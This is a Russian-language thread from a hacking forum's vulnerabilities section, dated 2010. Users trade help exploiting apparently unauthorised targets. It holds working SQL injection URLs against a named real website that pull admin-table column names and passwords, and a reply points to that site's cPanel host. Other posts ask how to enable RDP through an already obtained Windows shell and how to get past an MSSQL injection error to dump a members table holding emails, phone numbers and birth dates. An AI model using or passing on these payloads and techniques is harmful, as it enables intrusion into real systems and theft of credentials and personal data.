HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.10.2010, 19:47
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?
 
Ответить с цитированием

  #2  
Старый 10.10.2010, 19:58
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
Сообщение от .:[melkiy  
:."]
.:[melkiy]:. said:
есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?
там мой пост

в консоли команды прописываеш, а потом mstsc.
 
Ответить с цитированием

  #3  
Старый 10.10.2010, 20:40
S-J
Познающий
Регистрация: 24.09.2010
Сообщений: 84
С нами: 8227766

Репутация: 0
По умолчанию

Помогите раскрутить найденную уязвимость=)

http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%20666 1,%28select%20group_concat%28column_name%29%20from %20information_schema.columns%20where%20table_name %20=%200x61646d696e5f74626c%29,6663,6664,6665%20fr om%20admin_tbl--+

админку найте не могу...

//здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость
 
Ответить с цитированием

  #4  
Старый 10.10.2010, 21:16
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от S-J  
Помогите раскрутить найденную уязвимость=)
http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl
 
Ответить с цитированием

  #5  
Старый 10.10.2010, 21:33
S-J
Познающий
Регистрация: 24.09.2010
Сообщений: 84
С нами: 8227766

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl
Спасибо ещё бы админку)
 
Ответить с цитированием

  #6  
Старый 10.10.2010, 23:26
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

есть mssql inj

структура таблицы:

Цитата:
Сообщение от None  
[Allmembers
ostCode]
[Allmembers:Telephone]
[Allmembers:EnquiryDate]
[Allmembers:GenderCode]
[Allmembers:LastMailShotDate]
[Allmembers:StatusID]
[Allmembers:ContactMeans]
[Allmembers:County]
[Allmembers:BoxNo]
[Allmembers:E-mail]
[Allmembers:showemail]
[Allmembers:NickName]
[Allmembers
ateOfBirth]
не получается вывести инфо из нее - на все запросы выдает:

Invalid column name 'E-mail'.

как обойти?

и еще вопрос - как узнать количество записеи в табле?
 
Ответить с цитированием

  #7  
Старый 11.10.2010, 00:31
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
С нами: 8693835

Репутация: 0
По умолчанию

Цитата:
Сообщение от S-J  
Спасибо ещё бы админку)
cpanel.thegotomom.com

webdisk.thegotomom.com
 
Ответить с цитированием

  #8  
Старый 11.10.2010, 00:49
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
Сообщение от j0ker13  
есть mssql inj
структура таблицы:
не получается вывести инфо из нее - на все запросы выдает:
Invalid column name 'E-mail'.
как обойти?
и еще вопрос - как узнать количество записеи в табле?
Шифруй слово "email" в HEX или CHAR
 
Ответить с цитированием

  #9  
Старый 11.10.2010, 10:58
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами: 8456912

Репутация: 17
По умолчанию

Цитата:
Сообщение от Gemini12  
Шифруй слово "email" в HEX или CHAR
Вот скажи мне, зачем?
 
Ответить с цитированием

  #10  
Старый 11.10.2010, 11:24
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

дело не в этом.

даже при запросе

Цитата:
Сообщение от None  
select StatusID from Allmembers
выдает

Цитата:
Сообщение от None  
Invalid column name 'E-mail
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...